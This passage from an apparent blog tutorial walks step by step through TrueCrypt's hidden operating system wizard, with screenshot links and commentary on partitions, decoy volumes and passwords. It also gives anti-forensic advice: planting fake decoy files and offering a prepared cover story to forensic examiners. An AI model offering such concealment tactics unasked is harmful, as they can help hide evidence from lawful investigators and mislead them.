<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBDzveg-qOHW-akcipxgpAhaoKXCneSrI9ZcwrNV0_vY8vjzjmcY3tWoe8XWzUC5O2e0uGdHyV7XZ5FavjfdkFdhGmtMAsj4oXvc_hA6PghVZfhg-Y_jlCwO0CgPDFfzMLmOVxF1Oj2I/s1600/001.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBDzveg-qOHW-akcipxgpAhaoKXCneSrI9ZcwrNV0_vY8vjzjmcY3tWoe8XWzUC5O2e0uGdHyV7XZ5FavjfdkFdhGmtMAsj4oXvc_hA6PghVZfhg-Y_jlCwO0CgPDFfzMLmOVxF1Oj2I/s400/001.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to enlarge)</td></tr>
</tbody></table>
<br />
<i>NOTE: You may do better finding a
partitioning scheme that doesn't potentially give away that you are
using a hidden partition. If someone coerces you into giving them access
to the decoy operating system and they see that the second partition is
2.1 times larger that the first partition, this could be a give away --
though it's still technically plausibly deniable. Try using a
partitioning scheme that makes the second partition more like 2.5 or 3
times larger. As long as it is at least 2.1 times larger, you are okay.</i><br />
<br />
While
we're on the topic of partitioning, if at some point near the beginning
of the encryption wizard you get the dialog shown below then click yes,
reboot and start over. Paging files on a non-system partitions is a
no-go in an encrypted setup.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjldBMYrUxPviEHuru5936pra_UNjM9Bm8yRNqZptwTpC3ydgg5F5UAuTXPzmfKB7mrqSeng5-jYZkzPxYZwYSMdDRYStDLxYg1kZF3U4lcieRAFSTAou8gvIqvrS5gdGN6aNemztnM97A/s1600/000.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjldBMYrUxPviEHuru5936pra_UNjM9Bm8yRNqZptwTpC3ydgg5F5UAuTXPzmfKB7mrqSeng5-jYZkzPxYZwYSMdDRYStDLxYg1kZF3U4lcieRAFSTAou8gvIqvrS5gdGN6aNemztnM97A/s400/000.png" width="400" /></a></div>
<br />
Also,
in order to get your partitioning the way you want it, you may need to
shrink your system partition. If you have Windows 7, this is actually
pretty easy to do through Disk Management. Check Google. Can't remember
if you can shrink Vista, but who really cares, right? ;) If you get errors
when shrinking your system partition, their are some tricks you can do
to correct that including running a defrag, etc. That's outside the
scope of this article, so please check Google. Oh, and shrinking XP
without system damage is next to impossible, though not completely.<br />
<br />
~~
Okay, so once you've got your partitioning in order, go ahead and open
TrueCrypt and choose System>Create Hidden Operating System<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidDx5AWa8YDnWJhkN7560psbbLM7-QHy-54YsxVWCjWhmW0Nktn-0FLhvkh58aUkLOqUzLxyByMEiuUYoRAsKfVT8-dLRFZjkAc9Yg-uAjat8a7z5i0zPxyNh0NYUMFFh7z0PN4AEGkxU/s1600/002.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidDx5AWa8YDnWJhkN7560psbbLM7-QHy-54YsxVWCjWhmW0Nktn-0FLhvkh58aUkLOqUzLxyByMEiuUYoRAsKfVT8-dLRFZjkAc9Yg-uAjat8a7z5i0zPxyNh0NYUMFFh7z0PN4AEGkxU/s400/002.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Read the happy little dialog about someone holding a gun to your head and then click OK:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAUnnB9bo2m-cYPtpncA0y40oAggYvhHQ_2BaGfW-rlYVVJVtK-Mixq7HvFDeuktgZgR0lWDb42ZqUUieHCQqJV2HmO1APowAJGL3GT_AGFjbxB3LsnBozB4fUY2jmr7lb07uRMAd_7OI/s1600/003.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAUnnB9bo2m-cYPtpncA0y40oAggYvhHQ_2BaGfW-rlYVVJVtK-Mixq7HvFDeuktgZgR0lWDb42ZqUUieHCQqJV2HmO1APowAJGL3GT_AGFjbxB3LsnBozB4fUY2jmr7lb07uRMAd_7OI/s400/003.png" width="400" /></a></div>
~~
Below is actually one of the most useful informational dialogs we will
see during the wizard and explains the anatomy pretty well! Read and
click next of course...<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3EnLUgNwc85hJcQdLMxQb5Ci8nxnFq1qN3Sz965GTMHo1dR2DIBkrslzfiH-arVAzcR644g4UDBMqWxiJvfjCHAQJbEHvzPLiSo004M0Rg7n1Z9LLV7AYyL2AnafYhMYJi58r6w4puas/s1600/004.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3EnLUgNwc85hJcQdLMxQb5Ci8nxnFq1qN3Sz965GTMHo1dR2DIBkrslzfiH-arVAzcR644g4UDBMqWxiJvfjCHAQJbEHvzPLiSo004M0Rg7n1Z9LLV7AYyL2AnafYhMYJi58r6w4puas/s400/004.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to enlarge)</td></tr>
</tbody></table>
~~ So basically this next dialog is saying that your
current installation of Windows is going to be moved to the hidden
volume on Partition 2 and that you will have to reinstall Windows from
scratch onto Partition 1. If you have Windows installation media, click
yes.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec_aJFPXiwRy_2hvshPpkM4ezg25HJ4PpFzSew97vZJYCWrVEEWcvnUQEq-gmNrYjNOTCh9r_Fuoq2oQCQce_LeevbrfBa1GztsKma5hS5LNiQRPukSrgPycdWMxolD12pQi4U58PRFw/s1600/005.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec_aJFPXiwRy_2hvshPpkM4ezg25HJ4PpFzSew97vZJYCWrVEEWcvnUQEq-gmNrYjNOTCh9r_Fuoq2oQCQce_LeevbrfBa1GztsKma5hS5LNiQRPukSrgPycdWMxolD12pQi4U58PRFw/s400/005.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
The next dialog is mainly telling you that whenever you are booted into
your hidden operating system, you will not be able to write to any
unencrypted filesystems that you may happen to have. This is a good
thing because if you did mount an unencrypted file system, later
forensics may be performed on the unencrypted file system to determine
if it was mounted from a different operating system other than the decoy
operating system. This could give away your hidden operating system.</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1EGKrB6zSGEKO1fVudxs1uLoyVW7kAOBrS8rhBVvUbfRZbwKLKXkfXsQgD_up-PHnaFYs8KDmddZpzHz2rUnizJTzrxvJ7BkQtZwlIMLM3zWJKl6SdSEO772qvskfJTjjJ5GAJX9QZfQ/s1600/006.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1EGKrB6zSGEKO1fVudxs1uLoyVW7kAOBrS8rhBVvUbfRZbwKLKXkfXsQgD_up-PHnaFYs8KDmddZpzHz2rUnizJTzrxvJ7BkQtZwlIMLM3zWJKl6SdSEO772qvskfJTjjJ5GAJX9QZfQ/s1600/006.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Here you need to choose Single-boot even though we are going to setup 2
separate operating systems. Setting up Multi-boot is actually a whole
different thing and is outside the scope of this article:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaqRXMPIAhx-EdGrke-ghZfFbnSsKEhD11LBHP1Ntq7qt1tRjUvmM5ijOnURiTdrrPNq9EFq2TngFw_PB16s2lBL4hs7Hsv7tv6tUgGNHpS-z7b14-H-ySEqYtKewLsEhORgOoPpGP9CA/s1600/007.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaqRXMPIAhx-EdGrke-ghZfFbnSsKEhD11LBHP1Ntq7qt1tRjUvmM5ijOnURiTdrrPNq9EFq2TngFw_PB16s2lBL4hs7Hsv7tv6tUgGNHpS-z7b14-H-ySEqYtKewLsEhORgOoPpGP9CA/s400/007.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Make sure Windows is activated before you proceed. You don't want to be
activating a hidden operating system with Microsoft's servers when it
is supposed to be invisible. Don't blow your cover!:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXYA_gpZiM2YoSM_mGFv8SagTfi0uDaxa5GNodVKsWnmIGKQgS9e1wIGZbWAvckptRPL0yUXEjlLTLxK5fYKKCxciBIkRbMfcMlqA2Mu6aV3YA0YedI9t86_e4e806Qu0n_0_GdKo8Hj4/s1600/008.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXYA_gpZiM2YoSM_mGFv8SagTfi0uDaxa5GNodVKsWnmIGKQgS9e1wIGZbWAvckptRPL0yUXEjlLTLxK5fYKKCxciBIkRbMfcMlqA2Mu6aV3YA0YedI9t86_e4e806Qu0n_0_GdKo8Hj4/s400/008.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
This dialog may seem a little confusing but take a look at <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">the chart</a>
shown in <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="_blank">Part 1</a> and it should make a lot more sense. On most systems, the wording "first
partition behind the system partition" will simply translate to mean your second partition.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSa48uf2JkfVr1onnyiQLtCoYw9rV3bexUDzlcArzPkyCVPJ08rQnTU68decdN-oxheYN6R6LcPFEJWGAdWwpG0LGe0fsDAV8nCswyL0S7iz5yxY-tyk-wqJDb8YUl-CdZ5hSNU2gCUYE/s1600/009.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSa48uf2JkfVr1onnyiQLtCoYw9rV3bexUDzlcArzPkyCVPJ08rQnTU68decdN-oxheYN6R6LcPFEJWGAdWwpG0LGe0fsDAV8nCswyL0S7iz5yxY-tyk-wqJDb8YUl-CdZ5hSNU2gCUYE/s400/009.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Going with the defaults should be fine here. But if you want to geek out on different algorithms, go for it!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmfuDNNdo1iqAJSCXKjC6hOYG-N694XhsPqEfvDr54KaBAE5IT5BBER6XVs8pkyEsXFaXQuaN6gajpb4NGhhTsPNlK6J-5NcfAvYWWl63IuCjHB49DZLl_TRcNmE4blKBU_In8xh9robA/s1600/010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmfuDNNdo1iqAJSCXKjC6hOYG-N694XhsPqEfvDr54KaBAE5IT5BBER6XVs8pkyEsXFaXQuaN6gajpb4NGhhTsPNlK6J-5NcfAvYWWl63IuCjHB49DZLl_TRcNmE4blKBU_In8xh9robA/s400/010.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Double check that the partitioning looks right:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-NiwwNChj9u_cEWcAvGW583Xyx-b2jTADjGh7fgp9v0W0nDPliU0ujp0FDeO7zHepxiwiJkndLgv_A3FUNJLKe3dyl-G6HW6X81x32DqH9_3sHLVUAfb-DFZah6Iq45EfjrOw_Ar0610/s1600/011.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-NiwwNChj9u_cEWcAvGW583Xyx-b2jTADjGh7fgp9v0W0nDPliU0ujp0FDeO7zHepxiwiJkndLgv_A3FUNJLKe3dyl-G6HW6X81x32DqH9_3sHLVUAfb-DFZah6Iq45EfjrOw_Ar0610/s400/011.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Here you will create Password C. If you can't remember which is Password C, check the big <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">diagram</a> in <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="_blank">Part 1</a>.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOs16lRISMyxGyjSqxhHXRs4OCUaf5No-0mifJD2QVtkxAbdbD78FyUJ4-SoXdG3FCdghRpmCSL9gO_BzXk47uKnrqo7sQ7obvKy8HFNcDbNNRoVC_veGTfyKti8onW6FBNp8ZIRd3cUM/s1600/012.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOs16lRISMyxGyjSqxhHXRs4OCUaf5No-0mifJD2QVtkxAbdbD78FyUJ4-SoXdG3FCdghRpmCSL9gO_BzXk47uKnrqo7sQ7obvKy8HFNcDbNNRoVC_veGTfyKti8onW6FBNp8ZIRd3cUM/s400/012.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Do you intend to store files larger than 4 GB on the outer volume of
the second partition? (Probably not. Remember, this is the volume
containing decoy flat files.) </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQ9OJKsvUs__QOk-X836Uu6JjkkXhwr0BIwogOZz-ToKwG-EYogS1T5EAXbdTAokHJKoNkYcjJGjArkboSu1IyfRu2galjBE_iF1noBjSIiWmVit8cnJVwS9uVTA05ktNFEXmsNt8e6c/s1600/013.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQ9OJKsvUs__QOk-X836Uu6JjkkXhwr0BIwogOZz-ToKwG-EYogS1T5EAXbdTAokHJKoNkYcjJGjArkboSu1IyfRu2galjBE_iF1noBjSIiWmVit8cnJVwS9uVTA05ktNFEXmsNt8e6c/s400/013.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ I would go with the defaults here: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsRXQ3AwoNl3xkqsweg3ST2ZQeylDgk8P8eym5ZY9MKqrjhPWBlwuRs4zMPxuIw1N_mtzDY8bc_1tXdoztbKzQ0doPBpF6yJec-cr63evjoMSl1TSsv9ICIqJag6rVwlh9Be0GNrxs6I/s1600/014.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsRXQ3AwoNl3xkqsweg3ST2ZQeylDgk8P8eym5ZY9MKqrjhPWBlwuRs4zMPxuIw1N_mtzDY8bc_1tXdoztbKzQ0doPBpF6yJec-cr63evjoMSl1TSsv9ICIqJag6rVwlh9Be0GNrxs6I/s400/014.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Just double checking! Are you sure you don't have anything stored on the second partition that you don't want deleted?! </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPzgwMvinGmGYX8AAKl8_DcfLLQm-vN8tE6QKr4pnpFPIhoDUAjnVgLrJbQVtMRUk_e9IKDJyCLGWt5NOShFw0aHFLDzuRHhkWk9tQG-hD2jG1JI4P18bogWVXMZwoBivw3w-ls3BRN4/s1600/015.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPzgwMvinGmGYX8AAKl8_DcfLLQm-vN8tE6QKr4pnpFPIhoDUAjnVgLrJbQVtMRUk_e9IKDJyCLGWt5NOShFw0aHFLDzuRHhkWk9tQG-hD2jG1JI4P18bogWVXMZwoBivw3w-ls3BRN4/s400/015.png" width="400" /></a></div>
<br />
~~ This may take a while... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivjBqSSCiLhp9B4Lrs1fkeIpF2qMrqRsQTaBq9w6QiHVRJdFWJWPO_STXy3abG4ORHMrdlGNlS078G97lb9z4HRbfYrcTjUqIOqj1SKv8lcuzJPg9bG18A2tTCIjxjrSK2cvOz0HrDbRk/s1600/016.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivjBqSSCiLhp9B4Lrs1fkeIpF2qMrqRsQTaBq9w6QiHVRJdFWJWPO_STXy3abG4ORHMrdlGNlS078G97lb9z4HRbfYrcTjUqIOqj1SKv8lcuzJPg9bG18A2tTCIjxjrSK2cvOz0HrDbRk/s320/016.png" width="320" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
So if you are coerced into giving up Password A for the decoy operating
system installed on Partition 1, an adversary may notice Partition 2
and plausibly deduct that it contains encrypted data. Then they may
force you to give them Password C. Not to fear, however. Password C only
gives them access to the outer volume of Partition 2 which will contain
fake data in the form of flat files which are only a decoy. <b>It's now time for you to go ahead and create some fake files and copy them over to the outer volume on Partition 2</b>.
This is kind of funny. Um. Okay. How about a file that has a fake plan
of attack? Or maybe a list of bogus secret contacts? Of
course, keep in mind that your adversaries have Google, too, and if they
read this blog post then they may be looking for these, lol. So be
creative. Go on...Create some fake files already!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Oh,
you may wondering, "If they see a second partition and coerce me into
revealing the password to the outer volume, can't they accuse me of
having an inner volume, too? Won't they know I have a hidden operating
system?" Good thinking. They can certainly try to guess that this is the
case but you will be able to <b>plausibly deny</b> it. The decoy OS
can't be plausibly denied because of the password prompt at boot (unless
you removed it) and because most people have an operating system on
their computer, of course. The outer volume on the second partition
can't quite be plausibly denied because the it doesn't make a lot of
sense to have a second partition just sitting there with random ones and
zeros. The inner volume on the second partition <b>can </b>be plausibly
denied because the outer volume on the second partition is a plausible
explanation for the random ones and zeros on the second partition.
Getting confused? Read this paragraph 3 times slowly. ;)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The
way this all works is that the inner volume on Partition 2 uses the
free space of the outer volume on Partition 2. Genius, huh? However,
this means that if you write too many files onto the outer file you
could corrupt the inner volume. Once you get everything setup, TrueCrypt
has a handy checkbox for protecting the inner volume when mounting. For
now though, you need to read the dialog carefully and take note of the
space limits. (This will be covered more in Part 4.) Then
click Open Outer Volume and create/copy your decoy flat files. Leave the
TrueCrypt wizard open while you do this. Return to the wizard when you
are done and click next.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i>NOTE:
What about a data forensics expert noticing that the free space on the
outer volume of the second partition contains random ones and zeros
instead of say, being zeroed out? The hidden operating system is still plausibly deniable because the
claim could be made by the victim that at one point they shredded data
in that location with a software tool that overwrites with random bits,
per common practice. Thus, random bits were left on that volume.</i></span> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22xZkxoGGzkTOaV6YvyxCMd1oGIhqMsFoGxgR8i6uiEji7Nf4njLpco7sKL22w8WFbMfTPRtXxRPR-CzK5byzin467D7sQ6Ma90BGPH5WOOkuaYV66hVXsICq9_rkD-k_YC4TIZCG0WE/s1600/017.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh22xZkxoGGzkTOaV6YvyxCMd1oGIhqMsFoGxgR8i6uiEji7Nf4njLpco7sKL22w8WFbMfTPRtXxRPR-CzK5byzin467D7sQ6Ma90BGPH5WOOkuaYV66hVXsICq9_rkD-k_YC4TIZCG0WE/s400/017.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ We've completed the outer volume on the second partition and placed
decoy files in it. Now it's time to create the inner volume on the
second partition and copy the operating system from Partition 1 to the
inner volume of Partition 2. Click Next here:<i><br /></i></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kEBiuBZ5bnbL6Wl6l2_bmUFJMV6D9GH-NOxdlwsGzgqXjV0foCG3wDYJ8qLSCd5sFIsAHu-yjgR-kN5VcZWukZWqMG4aMsV-lcRHyfpYKWUs8ZhtdRzeBEkxWceLlMB1iAvZZqz6nZc/s1600/018.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5kEBiuBZ5bnbL6Wl6l2_bmUFJMV6D9GH-NOxdlwsGzgqXjV0foCG3wDYJ8qLSCd5sFIsAHu-yjgR-kN5VcZWukZWqMG4aMsV-lcRHyfpYKWUs8ZhtdRzeBEkxWceLlMB1iAvZZqz6nZc/s400/018.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~<span style="color: red;">Make
sure you write down what algorithm you use in the next steps!</span> (Wasn't
important for previous steps.) The decoy operating system on Partition 1
<b>must </b>use
the same encryption algorithm as the hidden operating system on the
inner volume of Partition 2. This is because there is a different
TrueCrypt bootloader for each encryption algorithm.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirjIswoiYFsW4RBpkRddFdBWwy893oyIl2RYklwmZ3-bTEd3l-RDZzddn1pqVQN2CvKNNhZYfTebw_CS22SSfRg9q1aySPtmzPmqzmLkPr025vnELCju-k6YAEy5Snh3yboY71X36nAt4/s1600/019.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirjIswoiYFsW4RBpkRddFdBWwy893oyIl2RYklwmZ3-bTEd3l-RDZzddn1pqVQN2CvKNNhZYfTebw_CS22SSfRg9q1aySPtmzPmqzmLkPr025vnELCju-k6YAEy5Snh3yboY71X36nAt4/s400/019.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Going with the default encryption algorithms should be fine, just remember which one you used!!:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPWssHMMYzbx537AaeBZlG1LfDNyB12JyhjYtfOa1cDJ3ZmX1UaDW_VbVVUJ6pYW3MhKHEbKl-DXWdebbS5QpU2b2_l1l1UYl4vpMziKeDf8nqFiSDF77PbsmSIbSIXTaXlgNywADy1Eg/s1600/enc-options.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPWssHMMYzbx537AaeBZlG1LfDNyB12JyhjYtfOa1cDJ3ZmX1UaDW_VbVVUJ6pYW3MhKHEbKl-DXWdebbS5QpU2b2_l1l1UYl4vpMziKeDf8nqFiSDF77PbsmSIbSIXTaXlgNywADy1Eg/s320/enc-options.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s1600/042.jpg" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Remember,
this whole setup is pointless if you don't use a Fort Knox kinda
password. For all three passwords, consider using a passphrase that is
at least 20 characters long and contains uppercase, lowercase, numerals
and symbols. Don't take hours and hours setting up a hidden operating
system and then use the name of your dog in h4x0R. Please. Also, don't
use similar passwords for Password A, Password B and Password C.
Otherwise, if an adversary suspects a hidden operating system and you
have already given them Password A and Password C, they may be able to
derive Password B.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOxOlXGRiIMLZ-AImRf_hmVARyG86Bi1Llv_5sOv9W3dpZH2vBUp21srckG58mUDOCWGOXv3zLFq3RkchdpdmG4VKg538mxwrDOm91a_0fqCiFkqzDw_gB72vy3lKfYLk9tR1MS4ZwfE/s1600/020.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSOxOlXGRiIMLZ-AImRf_hmVARyG86Bi1Llv_5sOv9W3dpZH2vBUp21srckG58mUDOCWGOXv3zLFq3RkchdpdmG4VKg538mxwrDOm91a_0fqCiFkqzDw_gB72vy3lKfYLk9tR1MS4ZwfE/s400/020.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
~Oh,
and please don't write this on a post it note and put it on your wall
or under your keyboard. Sigh. If you are going to use spy-level
technology, you are going to have to be a good spy. This means being a good memorizer. :) ...Enter <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">Password B</a>:<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
